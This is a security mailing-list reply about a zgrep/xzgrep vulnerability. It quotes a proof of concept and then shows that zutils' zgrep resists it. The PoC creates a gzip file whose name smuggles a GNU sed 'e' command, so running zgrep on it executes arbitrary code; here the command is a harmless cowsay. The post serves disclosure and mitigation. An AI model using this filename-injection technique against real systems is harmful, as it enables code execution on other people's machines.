Re: zgrep, xzgrep: arbitrary-file-write vulnerability

[Axel Beckert <abe () deuxchevaux org>]

Hi,

On Fri, Apr 08, 2022 at 10:23:29AM +0200, Jakub Wilk wrote:
> As mentioned in the xz patch, if you have GNU sed, you get not just file
> write, but direct code execution.

Ouch.

> PoC:
>
>    $ touch foo.gz
>    $ echo foo | gzip > "$(printf '|\n;e cowsay pwned\n#.gz')"
>    $ zgrep foo *.gz
>     _______
>    < pwned >
>     -------
>            \   ^__^
>             \  (oo)\_______
>                (__)\       )\/\
>                    ||----w |
>                    ||     ||
>    foo

JFTR, if you have replaced GNU's zgrep with zgrep from zutils
(https://www.nongnu.org/zutils/zutils.html; allows to use z* tools
with many compression formats, also mixed in a single command), then
this exploit does not work:

abe@c6:~/tmp/zgrep-PoC $ touch foo.gz
abe@c6:~/tmp/zgrep-PoC $ echo foo | gzip > "$(printf '|\n;e cowsay pwned\n#.gz')"
abe@c6:~/tmp/zgrep-PoC $ zgrep foo *.gz
|
;e cowsay pwned
#.gz:foo
abe@c6:~/tmp/zgrep-PoC $ zgrep.gzip foo *.gz
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
foo
abe@c6:~/tmp/zgrep-PoC $ dpkg -S /bin/zgrep
diversion by zutils from: /bin/zgrep
diversion by zutils to: /bin/zgrep.gzip
gzip, zutils: /bin/zgrep
abe@c6:~/tmp/zgrep-PoC

                Kind regards, Axel
-- 
PGP: 2FF9CD59612616B5      /~\  Plain Text Ribbon Campaign, http://arc.pasp.de/
Mail: abe () deuxchevaux org  \ /  Say No to HTML in E-Mail and Usenet
Mail+Jabber: abe () noone org  X
https://axel.beckert.ch/   / \  I love long mails: https://email.is-not-s.ms/

Attachment: signature.asc
Description: